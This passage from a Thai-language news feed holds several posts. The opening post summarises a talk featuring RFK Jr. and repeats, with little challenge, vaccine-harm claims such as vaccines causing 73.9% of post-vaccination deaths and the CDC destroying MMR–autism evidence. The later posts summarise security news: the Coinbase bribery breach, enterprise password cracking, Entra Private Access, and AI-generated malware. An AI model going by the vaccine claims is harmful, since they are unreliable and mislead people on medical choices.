มีประสิทธิภาพต่ำในการต่อสู้กับไวรัสที่ติดเชื้อทางเดินหายใจส่วนบนเนื่องจากการกลายพันธุ์อย่างรวดเร็ว** ซึ่งทำให้วัคซีนไม่สามารถป้องกันได้เมื่อเกิดการกลายพันธุ์เพียงครั้งเดียว เช่นกรณีของเชื้อ Omicron [1] เขายังชี้ให้เห็นถึงความเสี่ยงที่วัคซีนเหล่านี้อาจส่งเสริมการกลายพันธุ์และยืดเวลาการระบาดใหญ่ได้ [1] ความกังวลด้านความปลอดภัยของวัคซีนเป็นอีกหนึ่งประเด็นสำคัญที่ถูกหยิบยกขึ้นมา **RFK Jr. อ้างว่าวัคซีน COVID-19 อาจนำไปสู่การเสียชีวิตในบางกรณี** โดยอ้างอิงข้อมูลการชันสูตรพลิกศพที่ระบุว่าวัคซีนเป็นสาเหตุการเสียชีวิต 73.9% ในกลุ่มผู้เสียชีวิตหลังฉีดวัคซีน [1] เขายังวิพากษ์วิจารณ์อย่างรุนแรงถึงการที่ไม่มี "คำเตือนกล่องดำ" (blackbox warning) เรื่องการเสียชีวิตในเอกสารกำกับวัคซีน แม้ว่ากฎหมายของ FDA จะกำหนดไว้ [1] มีการเน้นย้ำถึง **การขาด Informed Consent (การยินยอมเข้ารับการรักษาโดยได้รับข้อมูลครบถ้วน) อย่างรุนแรง** ผู้ป่วยหลายราย รวมถึง Dr. Walscott แพทย์ที่ได้รับบาดเจ็บจากวัคซีนยืนยันว่าไม่ได้รับข้อมูลที่แท้จริงและโปร่งใส [1] ตัวอย่างที่สะเทือนใจคือเรื่องราวของ Crystal Cordingley ที่เชื่อว่าลูกชายของเธอ Corbin เสียชีวิตจากวัคซีนไข้หวัดใหญ่ โดยพบความเสียหายในสมองที่คล้ายกับกรณี SIDS [9, 10] เธอถูกปฏิเสธข้อมูลและ Informed Consent และพบว่ากุมารแพทย์ได้ยื่นรายงาน VAERS โดยที่เธอไม่ทราบ [10] นอกจากนี้ ยังมีข้อกล่าวหาว่าหน่วยงานเช่น American College of Obstetricians and Gynecologists (ACOG) ถูกควบคุมโดย HHS เพื่อผลักดันวัคซีนในหญิงตั้งครรภ์ [1] **ความเป็นพิษของ Spike Protein ก็เป็นประเด็นที่น่าจับตา** Dr. Robert Sullivan วิสัญญีแพทย์ผู้ได้รับผลกระทบ ได้เปิดเผยประสบการณ์ส่วนตัวเกี่ยวกับการเกิดความดันโลหิตสูงในปอด (Pulmonary Hypertension) หลังฉีดวัคซีน mRNA COVID-19 และการสูญเสียความจุปอดไปครึ่งหนึ่ง [7, 8] เขากล่าวถึงงานวิจัยที่คาดการณ์ว่า Spike Protein สามารถทำลายหลอดเลือดในปอดและรกได้ [8] และ Dr. Ryan Cole พยาธิแพทย์ได้สังเกตเห็นว่าปัญหาลิ่มเลือดในผู้ป่วย "แย่ลงมาก" หลังจากการฉีดวัคซีนทางพันธุกรรม โดยมีรายงานการเสียชีวิตฉับพลันและโรคหลอดเลือดสมองในผู้ป่วยอายุน้อย [11] การบรรยายยังเสนอว่า **"Long COVID" อาจเป็นการวินิจฉัยที่คลาดเคลื่อน และอาการต่างๆ เช่น สมองล้าและปัญหาทางระบบประสาท อาจเกิดจาก Spike Protein ที่ผลิตโดยวัคซีน mRNA** [12] วัคซีน mRNA ที่ได้รับการดัดแปลงยังพบว่าสามารถคงอยู่ในร่างกายได้นานหลายเดือนและพบได้ในเนื้องอก ซึ่งอาจนำไปสู่โรคแพ้ภูมิตัวเอง [13] **ระบบการแพทย์และหน่วยงานสาธารณสุขเองก็ตกอยู่ภายใต้การวิพากษ์วิจารณ์อย่างหนัก** ระบบ VAERS (Vaccine Adverse Event Reporting System) ไม่เป็นที่รู้จักหรือเข้าใจอย่างกว้างขวางในหมู่แพทย์ และมักไม่มีการปฏิบัติตามข้อกำหนดการรายงาน [8] นอกจากนี้ ยังไม่มีการศึกษาอย่างเป็นระบบเกี่ยวกับผลข้างเคียงจากวัคซีน และ "ต้นทุนที่ซ่อนอยู่ของการบาดเจ็บ" ก็ไม่ได้รับการศึกษาหรือสอนในโรงเรียนแพทย์ [7, 12] มีการกล่าวหาว่าเจ้าหน้าที่ CDC ถึงกับทำลายหลักฐานที่เชื่อมโยงวัคซีน MMR กับออทิซึมในเด็กชายชาวแอฟริกัน-อเมริกัน [15, 16] สถานการณ์ล่าสุดนี้สะท้อนให้เห็นถึง **ความจำเป็นเร่งด่วนในการฟื้นฟูความรับผิดชอบ ความโปร่งใส และความไว้วางใจของประชาชนในหน่วยงานรัฐบาลและระบบการแพทย์** โดยการตัดสินใจทางการแพทย์ทั้งหมดต้องตั้งอยู่บนพื้นฐานของ Informed Consent ที่แท้จริง [17] มีการคาดการณ์เชิงสมมติฐานว่าหากไม่มีการบังคับใช้คำสั่งให้ฉีดวัคซีน การระบาดใหญ่อาจถูกควบคุมได้เร็วกว่าโดยมุ่งเป้าไปที่กลุ่มเสี่ยงสูงและให้ไวรัสแพร่กระจายในกลุ่มเสี่ยงต่ำ เพื่อสร้างภูมิคุ้มกันหมู่ [6, 18] โดยสรุป สถานการณ์ปัจจุบันสะท้อนให้เห็นถึงการเรียกร้องที่เพิ่มขึ้นสำหรับการตรวจสอบข้อมูลเชิงวิทยาศาสตร์อย่างโปร่งใส การให้ความสำคัญกับ Informed Consent และการประเมินผลกระทบที่อาจเกิดขึ้นจากวัคซีน COVID-19 อย่างละเอียดถี่ถ้วน. https://www.youtube.com/live/4-JxzRRgdy0 https://youtu.be/-Y2d_4BSGP4 https://www.facebook.com/share/16v8B1t4by/
    0 Comments 0 Shares 266 Views 0 Reviews
  • เรื่องเล่าจากเบื้องหลัง Coinbase: เมื่อภัยไซเบอร์มาในรูปแบบ “สินบน”

    ในเดือนพฤษภาคม 2025 บริษัทคริปโตยักษ์ใหญ่ Coinbase ได้รับอีเมลจากแฮกเกอร์นิรนาม แจ้งว่าพวกเขาได้ข้อมูลลูกค้าจำนวนหนึ่ง พร้อมเอกสารภายในของบริษัท โดยขู่เรียกค่าไถ่ถึง 20 ล้านดอลลาร์เพื่อไม่ให้เผยแพร่ข้อมูล

    แต่สิ่งที่น่าตกใจไม่ใช่แค่การขโมยข้อมูล — แต่เป็น “วิธีการ” ที่แฮกเกอร์ใช้: พวกเขาเสนอสินบนให้พนักงาน outsource ที่ศูนย์บริการลูกค้าในอินเดีย (TaskUs) เพื่อให้เข้าถึงระบบภายใน โดยมีการจ่ายเงินสูงถึง 2,500 ดอลลาร์ต่อคนเพื่อให้คัดลอกข้อมูลจากระบบสนับสนุนลูกค้า

    ข้อมูลที่ถูกขโมยมีทั้งชื่อ เบอร์โทร อีเมล หมายเลขประกันสังคม และข้อมูลบัญชีธนาคารแบบ masked รวมถึงข้อมูลการใช้งานของลูกค้ากว่า 70,000 ราย — คิดเป็น 1% ของผู้ใช้งานรายเดือนของ Coinbase

    Coinbase ปฏิเสธที่จะจ่ายค่าไถ่ และสวนกลับด้วยการตั้งค่าหัวแฮกเกอร์ 20 ล้านดอลลาร์ พร้อมให้คำมั่นว่าจะชดเชยลูกค้าที่ตกเป็นเหยื่อของการหลอกลวงผ่าน social engineering และปรับปรุงระบบรักษาความปลอดภัยให้เข้มแข็งขึ้น

    นอกจากนี้ Coinbase ยังไล่พนักงานที่รับสินบนออกทันที และแจ้งหน่วยงานบังคับใช้กฎหมายทั้งในสหรัฐฯ และต่างประเทศให้ดำเนินคดี ส่วน TaskUs ก็หยุดให้บริการ Coinbase ที่ศูนย์ในอินเดีย และปลดพนักงานกว่า 226 คน

    สิ่งที่ผู้เชี่ยวชาญชี้คือ “การติดสินบน” กำลังกลายเป็นช่องทางใหม่ของแฮกเกอร์ในการเจาะระบบองค์กร โดยเฉพาะเมื่อการโจมตีแบบเดิม เช่น phishing เริ่มถูกป้องกันได้ดีขึ้น

    สรุปเนื้อหาเป็นหัวข้อ
    Coinbase ถูกแฮกเกอร์ขู่เรียกค่าไถ่ 20 ล้านดอลลาร์จากข้อมูลลูกค้าและเอกสารภายใน
    แฮกเกอร์ใช้วิธีติดสินบนพนักงาน outsource ที่บริษัท TaskUs ในอินเดีย
    มีการเสนอเงินสูงถึง $2,500 ต่อคนเพื่อให้คัดลอกข้อมูลจากระบบสนับสนุนลูกค้า
    ข้อมูลที่ถูกขโมยรวมถึงชื่อ เบอร์โทร อีเมล หมายเลขประกันสังคม และข้อมูลบัญชี
    Coinbase ปฏิเสธการจ่ายค่าไถ่ และตั้งค่าหัวแฮกเกอร์เป็นเงินเท่ากัน
    บริษัทให้คำมั่นว่าจะชดเชยลูกค้าที่ตกเป็นเหยื่อ social engineering
    พนักงานที่รับสินบนถูกไล่ออกทันที และถูกแจ้งความดำเนินคดี
    TaskUs หยุดให้บริการ Coinbase ที่ศูนย์ในอินเดีย และปลดพนักงาน 226 คน
    Coinbase ประเมินค่าเสียหายและค่าชดเชยอยู่ระหว่าง $180M ถึง $400M
    ผู้เชี่ยวชาญแนะนำให้ฝึกอบรมพนักงานเรื่องการรับมือกับการติดสินบน

    ข้อมูลเสริมจากภายนอก
    กลุ่มแฮกเกอร์ “The Com” อ้างว่าอยู่เบื้องหลังการโจมตี แต่ยังไม่มีการยืนยัน
    การติดสินบนพนักงานเพื่อเข้าถึงข้อมูลภายในเคยเกิดขึ้นกับ Tesla ในปี 2020
    การใช้สินบนเป็นช่องทางโจมตีองค์กรกำลังเพิ่มขึ้นในหลายอุตสาหกรรม
    การฝึกอบรมพนักงานให้รู้เท่าทันการติดสินบนควรเป็นส่วนหนึ่งของแผนความปลอดภัย
    การตั้งศูนย์บริการใหม่ในสหรัฐฯ เป็นหนึ่งในมาตรการป้องกันของ Coinbase

    https://www.csoonline.com/article/4042522/behind-the-coinbase-breach-bribery-is-an-emerging-enterprise-threat.html
    💸 เรื่องเล่าจากเบื้องหลัง Coinbase: เมื่อภัยไซเบอร์มาในรูปแบบ “สินบน” ในเดือนพฤษภาคม 2025 บริษัทคริปโตยักษ์ใหญ่ Coinbase ได้รับอีเมลจากแฮกเกอร์นิรนาม แจ้งว่าพวกเขาได้ข้อมูลลูกค้าจำนวนหนึ่ง พร้อมเอกสารภายในของบริษัท โดยขู่เรียกค่าไถ่ถึง 20 ล้านดอลลาร์เพื่อไม่ให้เผยแพร่ข้อมูล แต่สิ่งที่น่าตกใจไม่ใช่แค่การขโมยข้อมูล — แต่เป็น “วิธีการ” ที่แฮกเกอร์ใช้: พวกเขาเสนอสินบนให้พนักงาน outsource ที่ศูนย์บริการลูกค้าในอินเดีย (TaskUs) เพื่อให้เข้าถึงระบบภายใน โดยมีการจ่ายเงินสูงถึง 2,500 ดอลลาร์ต่อคนเพื่อให้คัดลอกข้อมูลจากระบบสนับสนุนลูกค้า ข้อมูลที่ถูกขโมยมีทั้งชื่อ เบอร์โทร อีเมล หมายเลขประกันสังคม และข้อมูลบัญชีธนาคารแบบ masked รวมถึงข้อมูลการใช้งานของลูกค้ากว่า 70,000 ราย — คิดเป็น 1% ของผู้ใช้งานรายเดือนของ Coinbase Coinbase ปฏิเสธที่จะจ่ายค่าไถ่ และสวนกลับด้วยการตั้งค่าหัวแฮกเกอร์ 20 ล้านดอลลาร์ พร้อมให้คำมั่นว่าจะชดเชยลูกค้าที่ตกเป็นเหยื่อของการหลอกลวงผ่าน social engineering และปรับปรุงระบบรักษาความปลอดภัยให้เข้มแข็งขึ้น นอกจากนี้ Coinbase ยังไล่พนักงานที่รับสินบนออกทันที และแจ้งหน่วยงานบังคับใช้กฎหมายทั้งในสหรัฐฯ และต่างประเทศให้ดำเนินคดี ส่วน TaskUs ก็หยุดให้บริการ Coinbase ที่ศูนย์ในอินเดีย และปลดพนักงานกว่า 226 คน สิ่งที่ผู้เชี่ยวชาญชี้คือ “การติดสินบน” กำลังกลายเป็นช่องทางใหม่ของแฮกเกอร์ในการเจาะระบบองค์กร โดยเฉพาะเมื่อการโจมตีแบบเดิม เช่น phishing เริ่มถูกป้องกันได้ดีขึ้น 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ Coinbase ถูกแฮกเกอร์ขู่เรียกค่าไถ่ 20 ล้านดอลลาร์จากข้อมูลลูกค้าและเอกสารภายใน ➡️ แฮกเกอร์ใช้วิธีติดสินบนพนักงาน outsource ที่บริษัท TaskUs ในอินเดีย ➡️ มีการเสนอเงินสูงถึง $2,500 ต่อคนเพื่อให้คัดลอกข้อมูลจากระบบสนับสนุนลูกค้า ➡️ ข้อมูลที่ถูกขโมยรวมถึงชื่อ เบอร์โทร อีเมล หมายเลขประกันสังคม และข้อมูลบัญชี ➡️ Coinbase ปฏิเสธการจ่ายค่าไถ่ และตั้งค่าหัวแฮกเกอร์เป็นเงินเท่ากัน ➡️ บริษัทให้คำมั่นว่าจะชดเชยลูกค้าที่ตกเป็นเหยื่อ social engineering ➡️ พนักงานที่รับสินบนถูกไล่ออกทันที และถูกแจ้งความดำเนินคดี ➡️ TaskUs หยุดให้บริการ Coinbase ที่ศูนย์ในอินเดีย และปลดพนักงาน 226 คน ➡️ Coinbase ประเมินค่าเสียหายและค่าชดเชยอยู่ระหว่าง $180M ถึง $400M ➡️ ผู้เชี่ยวชาญแนะนำให้ฝึกอบรมพนักงานเรื่องการรับมือกับการติดสินบน ✅ ข้อมูลเสริมจากภายนอก ➡️ กลุ่มแฮกเกอร์ “The Com” อ้างว่าอยู่เบื้องหลังการโจมตี แต่ยังไม่มีการยืนยัน ➡️ การติดสินบนพนักงานเพื่อเข้าถึงข้อมูลภายในเคยเกิดขึ้นกับ Tesla ในปี 2020 ➡️ การใช้สินบนเป็นช่องทางโจมตีองค์กรกำลังเพิ่มขึ้นในหลายอุตสาหกรรม ➡️ การฝึกอบรมพนักงานให้รู้เท่าทันการติดสินบนควรเป็นส่วนหนึ่งของแผนความปลอดภัย ➡️ การตั้งศูนย์บริการใหม่ในสหรัฐฯ เป็นหนึ่งในมาตรการป้องกันของ Coinbase https://www.csoonline.com/article/4042522/behind-the-coinbase-breach-bribery-is-an-emerging-enterprise-threat.html
    WWW.CSOONLINE.COM
    Behind the Coinbase breach: Bribery emerges as enterprise threat
    Coinbase’s breach shows how bribery schemes — long used for SIM swaps — can be a potent enterprise attack vector. Experts urge security leaders to add bribery training and red-teaming to their cyber defense toolkits.
    0 Comments 0 Shares 229 Views 0 Reviews
  • เมื่อรหัสผ่านองค์กรกลายเป็นจุดอ่อน – และแฮกเกอร์ไม่ต้องพยายามมากอีกต่อไป

    ในปี 2025 รายงาน Blue Report ของ Picus Security เผยข้อมูลที่น่าตกใจว่า ใน 46% ขององค์กรที่ทำการทดสอบ มีรหัสผ่านอย่างน้อยหนึ่งชุดถูกเจาะสำเร็จ เพิ่มขึ้นจาก 25% ในปี 2024 ซึ่งสะท้อนถึงปัญหาที่เรื้อรังมานาน: การใช้รหัสผ่านที่อ่อนแอและนโยบายที่ล้าสมัย

    แม้จะมีการรณรงค์เรื่องความปลอดภัยมาหลายปี แต่หลายองค์กรยังคงใช้รหัสผ่านที่เดาง่าย ซ้ำซาก หรือไม่บังคับให้เปลี่ยนรหัสอย่างสม่ำเสมอ บางแห่งยังใช้วิธีเก็บ hash แบบ MD5 หรือ SHA-1 ซึ่งถูกแฮกได้ง่ายด้วยเทคนิค brute-force หรือ rainbow table

    ที่น่ากังวลกว่านั้นคือ การโจมตีด้วยรหัสผ่านที่ถูกขโมย (เช่นจาก phishing หรือ malware) มีอัตราความสำเร็จสูงถึง 98% และการป้องกันการขโมยข้อมูล (data exfiltration) สำเร็จเพียง 3% เท่านั้น ซึ่งลดลงจาก 9% ในปีที่แล้ว

    ผู้เชี่ยวชาญเตือนว่าองค์กรต้องเปลี่ยนจากแนวคิด “ตั้งค่าแล้วปล่อยไว้” ไปสู่การตรวจสอบระบบอย่างต่อเนื่อง และใช้มาตรการเชิงรุก เช่น MFA, การวิเคราะห์พฤติกรรมผู้ใช้, และการจัดการสิทธิ์แบบละเอียด

    สรุปเนื้อหาเป็นหัวข้อ
    46% ขององค์กรที่ทดสอบมีรหัสผ่านถูกเจาะสำเร็จอย่างน้อยหนึ่งชุด
    เพิ่มขึ้นจาก 25% ในปี 2024 สะท้อนถึงการใช้รหัสผ่านที่อ่อนแอและนโยบายล้าสมัย
    การโจมตีด้วยรหัสผ่านที่ถูกขโมยมีอัตราความสำเร็จสูงถึง 98%
    การป้องกันการขโมยข้อมูลสำเร็จเพียง 3% ลดลงจาก 9% ในปีที่แล้ว
    แฮกเกอร์ใช้เทคนิค brute-force, rainbow table, password spraying และ infostealer malware
    การเก็บ hash แบบ MD5 หรือ SHA-1 ไม่ปลอดภัยอีกต่อไป
    ควรใช้ bcrypt, Argon2 หรือ scrypt ร่วมกับ salt และ pepper เพื่อเพิ่มความปลอดภัย
    ช่องโหว่เกิดจากการตั้งค่าระบบที่ไม่ต่อเนื่อง เช่น logging gaps และ detection rule ที่ไม่แม่นยำ
    การตรวจจับพฤติกรรมผิดปกติ เช่น การเคลื่อนไหวภายในระบบ (lateral movement) ยังมีประสิทธิภาพต่ำ
    การใช้ MFA และการจัดการสิทธิ์แบบละเอียดเป็นมาตรการพื้นฐานที่ควรมี

    ข้อมูลเสริมจากภายนอก
    Infostealer malware เพิ่มขึ้น 3 เท่าในปี 2025 และเป็นภัยหลักในการขโมย credentials
    การโจมตีแบบ Valid Accounts (MITRE ATT&CK T1078) เป็นวิธีที่แฮกเกอร์นิยมใช้
    Ransomware เช่น BlackByte, BabLock และ Maori ยังเป็นภัยที่ป้องกันได้ยาก
    การตรวจจับการค้นหาข้อมูลระบบ (System Discovery) มีประสิทธิภาพต่ำกว่า 12%
    การเปลี่ยนแนวคิดเป็น “assume breach” ช่วยให้ตอบสนองต่อภัยคุกคามได้เร็วขึ้น

    https://www.csoonline.com/article/4042464/enterprise-passwords-becoming-even-easier-to-steal-and-abuse.html
    🎙️ เมื่อรหัสผ่านองค์กรกลายเป็นจุดอ่อน – และแฮกเกอร์ไม่ต้องพยายามมากอีกต่อไป ในปี 2025 รายงาน Blue Report ของ Picus Security เผยข้อมูลที่น่าตกใจว่า ใน 46% ขององค์กรที่ทำการทดสอบ มีรหัสผ่านอย่างน้อยหนึ่งชุดถูกเจาะสำเร็จ เพิ่มขึ้นจาก 25% ในปี 2024 ซึ่งสะท้อนถึงปัญหาที่เรื้อรังมานาน: การใช้รหัสผ่านที่อ่อนแอและนโยบายที่ล้าสมัย แม้จะมีการรณรงค์เรื่องความปลอดภัยมาหลายปี แต่หลายองค์กรยังคงใช้รหัสผ่านที่เดาง่าย ซ้ำซาก หรือไม่บังคับให้เปลี่ยนรหัสอย่างสม่ำเสมอ บางแห่งยังใช้วิธีเก็บ hash แบบ MD5 หรือ SHA-1 ซึ่งถูกแฮกได้ง่ายด้วยเทคนิค brute-force หรือ rainbow table ที่น่ากังวลกว่านั้นคือ การโจมตีด้วยรหัสผ่านที่ถูกขโมย (เช่นจาก phishing หรือ malware) มีอัตราความสำเร็จสูงถึง 98% และการป้องกันการขโมยข้อมูล (data exfiltration) สำเร็จเพียง 3% เท่านั้น ซึ่งลดลงจาก 9% ในปีที่แล้ว ผู้เชี่ยวชาญเตือนว่าองค์กรต้องเปลี่ยนจากแนวคิด “ตั้งค่าแล้วปล่อยไว้” ไปสู่การตรวจสอบระบบอย่างต่อเนื่อง และใช้มาตรการเชิงรุก เช่น MFA, การวิเคราะห์พฤติกรรมผู้ใช้, และการจัดการสิทธิ์แบบละเอียด 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ 46% ขององค์กรที่ทดสอบมีรหัสผ่านถูกเจาะสำเร็จอย่างน้อยหนึ่งชุด ➡️ เพิ่มขึ้นจาก 25% ในปี 2024 สะท้อนถึงการใช้รหัสผ่านที่อ่อนแอและนโยบายล้าสมัย ➡️ การโจมตีด้วยรหัสผ่านที่ถูกขโมยมีอัตราความสำเร็จสูงถึง 98% ➡️ การป้องกันการขโมยข้อมูลสำเร็จเพียง 3% ลดลงจาก 9% ในปีที่แล้ว ➡️ แฮกเกอร์ใช้เทคนิค brute-force, rainbow table, password spraying และ infostealer malware ➡️ การเก็บ hash แบบ MD5 หรือ SHA-1 ไม่ปลอดภัยอีกต่อไป ➡️ ควรใช้ bcrypt, Argon2 หรือ scrypt ร่วมกับ salt และ pepper เพื่อเพิ่มความปลอดภัย ➡️ ช่องโหว่เกิดจากการตั้งค่าระบบที่ไม่ต่อเนื่อง เช่น logging gaps และ detection rule ที่ไม่แม่นยำ ➡️ การตรวจจับพฤติกรรมผิดปกติ เช่น การเคลื่อนไหวภายในระบบ (lateral movement) ยังมีประสิทธิภาพต่ำ ➡️ การใช้ MFA และการจัดการสิทธิ์แบบละเอียดเป็นมาตรการพื้นฐานที่ควรมี ✅ ข้อมูลเสริมจากภายนอก ➡️ Infostealer malware เพิ่มขึ้น 3 เท่าในปี 2025 และเป็นภัยหลักในการขโมย credentials ➡️ การโจมตีแบบ Valid Accounts (MITRE ATT&CK T1078) เป็นวิธีที่แฮกเกอร์นิยมใช้ ➡️ Ransomware เช่น BlackByte, BabLock และ Maori ยังเป็นภัยที่ป้องกันได้ยาก ➡️ การตรวจจับการค้นหาข้อมูลระบบ (System Discovery) มีประสิทธิภาพต่ำกว่า 12% ➡️ การเปลี่ยนแนวคิดเป็น “assume breach” ช่วยให้ตอบสนองต่อภัยคุกคามได้เร็วขึ้น https://www.csoonline.com/article/4042464/enterprise-passwords-becoming-even-easier-to-steal-and-abuse.html
    WWW.CSOONLINE.COM
    Enterprise passwords becoming even easier to steal and abuse
    More effective cracking, continued reliance on weak or outdated policies, and security controls against credential leaks being increasingly undermined.
    0 Comments 0 Shares 249 Views 0 Reviews
  • Microsoft Entra Private Access – เปลี่ยนการเข้าถึง Active Directory แบบเดิมให้ปลอดภัยยิ่งขึ้น

    ในยุคที่องค์กรกำลังเปลี่ยนผ่านสู่ระบบคลาวด์ ความปลอดภัยของระบบภายในองค์กรก็ยังคงเป็นเป้าหมายของแฮกเกอร์ โดยเฉพาะ Active Directory ที่ยังคงถูกใช้งานอย่างแพร่หลายในหน่วยงานรัฐและองค์กรขนาดใหญ่

    Microsoft จึงเปิดตัว “Entra Private Access” ซึ่งเป็นฟีเจอร์ใหม่ที่นำความสามารถด้าน Conditional Access และ Multi-Factor Authentication (MFA) จากระบบคลาวด์ มาสู่ระบบ Active Directory ที่อยู่ภายในองค์กร (on-premises) โดยใช้แนวคิด Zero Trust Network Access (ZTNA)

    แต่ก่อนจะใช้งานได้ องค์กรต้อง “ล้าง NTLM” ออกจากระบบให้หมด และเปลี่ยนมาใช้ Kerberos แทน เพราะ NTLM เป็นโปรโตคอลเก่าที่มีช่องโหว่ด้านความปลอดภัยสูง

    การติดตั้ง Entra Private Access ต้องมีการกำหนดค่าเครือข่าย เช่น เปิดพอร์ต TCP 1337 บน Firewall, ระบุ Service Principal Name (SPN) ของแอปภายใน และติดตั้ง Private Access Sensor บน Domain Controller รวมถึงต้องใช้เครื่องลูกข่ายที่เป็น Windows 10 ขึ้นไป และเชื่อมต่อกับ Microsoft Entra ID

    แม้จะดูซับซ้อน แต่การเปลี่ยนผ่านนี้จะช่วยให้องค์กรสามารถควบคุมการเข้าถึงระบบภายในได้อย่างปลอดภัยมากขึ้น ลดการพึ่งพา VPN แบบเดิม และเตรียมพร้อมสู่การป้องกันภัยไซเบอร์ในระดับสูง

    Microsoft เปิดตัว Entra Private Access สำหรับ Active Directory ภายในองค์กร
    ฟีเจอร์นี้นำ Conditional Access และ MFA จากคลาวด์มาใช้กับระบบ on-premises
    ใช้แนวคิด Zero Trust Network Access (ZTNA) เพื่อควบคุมการเข้าถึง
    ต้องลบ NTLM ออกจากระบบและใช้ Kerberos แทนเพื่อใช้งานฟีเจอร์นี้
    เปิดพอร์ต TCP 1337 บน Firewall และกำหนด SPN ของแอปภายใน
    ต้องใช้เครื่องลูกข่าย Windows 10+ ที่เชื่อมต่อกับ Microsoft Entra ID
    รองรับ Windows 10, 11 และ Android ส่วน macOS/iOS ยังอยู่ในช่วงทดลอง
    เอกสารการติดตั้งฉบับเต็มเผยแพร่เมื่อเดือนกรกฎาคม 2025
    สามารถใช้ trial license ทดสอบการติดตั้งแบบ proof of concept ได้

    NTLM เป็นโปรโตคอลเก่าที่มีช่องโหว่ เช่น relay attack และ credential theft
    Kerberos ใช้ระบบ ticket-based authentication ที่ปลอดภัยกว่า
    Zero Trust เป็นแนวคิดที่ไม่เชื่อถืออัตโนมัติแม้จะอยู่ในเครือข่ายองค์กร
    VPN แบบเดิมมีความเสี่ยงจากการถูกเจาะระบบและไม่รองรับการควบคุมแบบละเอียด
    การใช้ SPN ช่วยระบุแอปภายในที่ต้องการป้องกันได้อย่างแม่นยำ
    การบังคับใช้ MFA ช่วยลดความเสี่ยงจากการโจมตีด้วยรหัสผ่านที่รั่วไหล

    https://www.csoonline.com/article/4041752/microsoft-entra-private-access-brings-conditional-access-to-on-prem-active-directory.html
    🧠 Microsoft Entra Private Access – เปลี่ยนการเข้าถึง Active Directory แบบเดิมให้ปลอดภัยยิ่งขึ้น ในยุคที่องค์กรกำลังเปลี่ยนผ่านสู่ระบบคลาวด์ ความปลอดภัยของระบบภายในองค์กรก็ยังคงเป็นเป้าหมายของแฮกเกอร์ โดยเฉพาะ Active Directory ที่ยังคงถูกใช้งานอย่างแพร่หลายในหน่วยงานรัฐและองค์กรขนาดใหญ่ Microsoft จึงเปิดตัว “Entra Private Access” ซึ่งเป็นฟีเจอร์ใหม่ที่นำความสามารถด้าน Conditional Access และ Multi-Factor Authentication (MFA) จากระบบคลาวด์ มาสู่ระบบ Active Directory ที่อยู่ภายในองค์กร (on-premises) โดยใช้แนวคิด Zero Trust Network Access (ZTNA) แต่ก่อนจะใช้งานได้ องค์กรต้อง “ล้าง NTLM” ออกจากระบบให้หมด และเปลี่ยนมาใช้ Kerberos แทน เพราะ NTLM เป็นโปรโตคอลเก่าที่มีช่องโหว่ด้านความปลอดภัยสูง การติดตั้ง Entra Private Access ต้องมีการกำหนดค่าเครือข่าย เช่น เปิดพอร์ต TCP 1337 บน Firewall, ระบุ Service Principal Name (SPN) ของแอปภายใน และติดตั้ง Private Access Sensor บน Domain Controller รวมถึงต้องใช้เครื่องลูกข่ายที่เป็น Windows 10 ขึ้นไป และเชื่อมต่อกับ Microsoft Entra ID แม้จะดูซับซ้อน แต่การเปลี่ยนผ่านนี้จะช่วยให้องค์กรสามารถควบคุมการเข้าถึงระบบภายในได้อย่างปลอดภัยมากขึ้น ลดการพึ่งพา VPN แบบเดิม และเตรียมพร้อมสู่การป้องกันภัยไซเบอร์ในระดับสูง ➡️ Microsoft เปิดตัว Entra Private Access สำหรับ Active Directory ภายในองค์กร ➡️ ฟีเจอร์นี้นำ Conditional Access และ MFA จากคลาวด์มาใช้กับระบบ on-premises ➡️ ใช้แนวคิด Zero Trust Network Access (ZTNA) เพื่อควบคุมการเข้าถึง ➡️ ต้องลบ NTLM ออกจากระบบและใช้ Kerberos แทนเพื่อใช้งานฟีเจอร์นี้ ➡️ เปิดพอร์ต TCP 1337 บน Firewall และกำหนด SPN ของแอปภายใน ➡️ ต้องใช้เครื่องลูกข่าย Windows 10+ ที่เชื่อมต่อกับ Microsoft Entra ID ➡️ รองรับ Windows 10, 11 และ Android ส่วน macOS/iOS ยังอยู่ในช่วงทดลอง ➡️ เอกสารการติดตั้งฉบับเต็มเผยแพร่เมื่อเดือนกรกฎาคม 2025 ➡️ สามารถใช้ trial license ทดสอบการติดตั้งแบบ proof of concept ได้ ➡️ NTLM เป็นโปรโตคอลเก่าที่มีช่องโหว่ เช่น relay attack และ credential theft ➡️ Kerberos ใช้ระบบ ticket-based authentication ที่ปลอดภัยกว่า ➡️ Zero Trust เป็นแนวคิดที่ไม่เชื่อถืออัตโนมัติแม้จะอยู่ในเครือข่ายองค์กร ➡️ VPN แบบเดิมมีความเสี่ยงจากการถูกเจาะระบบและไม่รองรับการควบคุมแบบละเอียด ➡️ การใช้ SPN ช่วยระบุแอปภายในที่ต้องการป้องกันได้อย่างแม่นยำ ➡️ การบังคับใช้ MFA ช่วยลดความเสี่ยงจากการโจมตีด้วยรหัสผ่านที่รั่วไหล https://www.csoonline.com/article/4041752/microsoft-entra-private-access-brings-conditional-access-to-on-prem-active-directory.html
    WWW.CSOONLINE.COM
    Microsoft Entra Private Access brings conditional access to on-prem Active Directory
    Microsoft has extended Entra’s powerful access control capabilities to on-premises applications — but you’ll need to rid your network of NTLM to take advantage of adding cloud features to your Active Directory.
    0 Comments 0 Shares 216 Views 0 Reviews
  • มัลแวร์ที่สร้างโดย AI: ภัยเงียบที่ปรับตัวได้และไม่มีวันหยุด
    ในปี 2025 โลกไซเบอร์กำลังเผชิญกับศัตรูรูปแบบใหม่—มัลแวร์ที่สร้างโดย Generative AI (GenAI) ซึ่งสามารถเรียนรู้ ปรับเปลี่ยน และหลบหลีกระบบป้องกันได้อย่างมีประสิทธิภาพ

    CrowdStrike รายงานว่าแฮกเกอร์จากเกาหลีเหนือ รัสเซีย และอิหร่านใช้ AI สร้างมัลแวร์ที่สามารถเจาะระบบองค์กร สร้างเรซูเม่ปลอม และแม้แต่สัมภาษณ์งานด้วย deepfake เพื่อแฝงตัวเข้าไปในบริษัท

    มัลแวร์เหล่านี้ไม่เพียงแต่หลบหลีกการตรวจจับแบบเดิมได้ แต่ยังสามารถปรับเปลี่ยนตัวเองแบบ “polymorphic” คือเปลี่ยนโค้ดตลอดเวลาเพื่อไม่ให้ถูกจับได้

    AI ยังช่วยสร้างอีเมล phishing ที่เหมือนจริงมากจนผู้ใช้ทั่วไปแยกไม่ออก และสามารถวิเคราะห์ระบบเป้าหมายเพื่อหาช่องโหว่แบบเรียลไทม์

